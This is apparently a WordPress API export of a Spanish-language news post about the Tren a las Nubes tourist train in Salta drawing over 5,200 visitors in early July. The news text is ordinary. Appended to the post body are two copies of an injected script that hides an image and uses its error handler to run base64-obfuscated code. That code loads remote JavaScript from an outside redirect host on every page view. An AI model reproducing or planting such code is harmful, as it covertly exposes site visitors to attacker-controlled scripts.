{"id":4198,"date":"2024-07-15T21:15:29","date_gmt":"2024-07-16T00:15:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4198"},"modified":"2025-08-13T23:52:47","modified_gmt":"2025-08-14T02:52:47","slug":"tren-a-las-nubes-mas-de-5200-turistas-en-las-dos-primeras-semanas-de-julio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4198","title":{"rendered":"Tren a las Nubes: M\u00e1s de 5200 turistas en las dos primeras semanas de julio"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4c0560681af40ad65eb00afcafd74dfa\" style=\"background-color:#065785\"><em>El Tren a las Nubes se consolida como la experiencia tur\u00edstica ferroviaria m\u00e1s importante de Argentina para el mundo.<\/em><\/h3>\n\n\n\n<p>El Tren a las Nubes, una de los \u00edconos tur\u00edsticos de Argentina, recibe una alta demanda en la temporada de invierno, por lo cual, a las 21 salidas programadas para julio, se adicionaron otras 10 totalizando 31 en el mes, al momento con un 94% de ocupaci\u00f3n total. M\u00e1s de 5200 turistas disfrutaron de esta experiencia en las dos primeras semanas de vacaciones.<\/p>\n\n\n\n<p>Con este refuerzo de salidas previstas para el mes, disfrutar\u00e1n de este \u00edcono tur\u00edstico visitantes distribuidos entre internacionales, nacionales y tambi\u00e9n salte\u00f1os. Esta cifra no solo refleja la popularidad del recorrido, sino tambi\u00e9n el creciente inter\u00e9s por las maravillas naturales y culturales que ofrece el noroeste argentino, sumado a la permanente inversi\u00f3n en la formaci\u00f3n, y en la pr\u00f3xima inauguraci\u00f3n de la Estaci\u00f3n de Trenes de San Antonio de los Cobres, que contempla una renovaci\u00f3n total, con una intervenci\u00f3n de m\u00e1s de 7000 mts2.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12984-tren-a-las-nubes-mas-de-5200-turistas-en-las-dos-primeras-semanas-de-julio.JPG\" alt=\"\" style=\"width:385px;height:auto\"\/><\/figure><\/div>\n\n\n<p>El Tren a las Nubes ofrece experiencias \u00fanicas, el visitante puede acceder a una vivencia cultural con las comunidades de la Quebrada del Toro, igual que con los pueblos andinos y apreciar una obra de ingenier\u00eda \u00fanica, que se suman a las vistas inigualables en el trayecto hacia el Viaducto La Polvorilla, donde se aprecia la mano e ingenier\u00eda del hombre en un escenario majestuoso.<\/p>\n\n\n\n<p>El \u00e9xito de este servicio, adem\u00e1s, es una buena noticia para las comunidades y la econom\u00eda local donde el Tren tiene presencia, la afluencia de turistas impulsa el comercio de artesan\u00edas, gastronom\u00eda, entre otros sectores.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/tren-a-las-nubes-mas-de-5200-turistas-en-las-dos-primeras-semanas-de-julio-96706\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Tren a las Nubes se consolida como la experiencia tur\u00edstica ferroviaria m\u00e1s importante de Argentina para el mundo. El Tren a las Nubes, una de los \u00edconos tur\u00edsticos de Argentina, recibe una alta demanda en la temporada de invierno, por lo cual, a las 21 salidas programadas para julio, se adicionaron otras 10 totalizando [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4199,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-4198","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4198"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4198"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4198\/revisions"}],"predecessor-version":[{"id":6741,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4198\/revisions\/6741"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4199"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4198"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4198"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4198"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}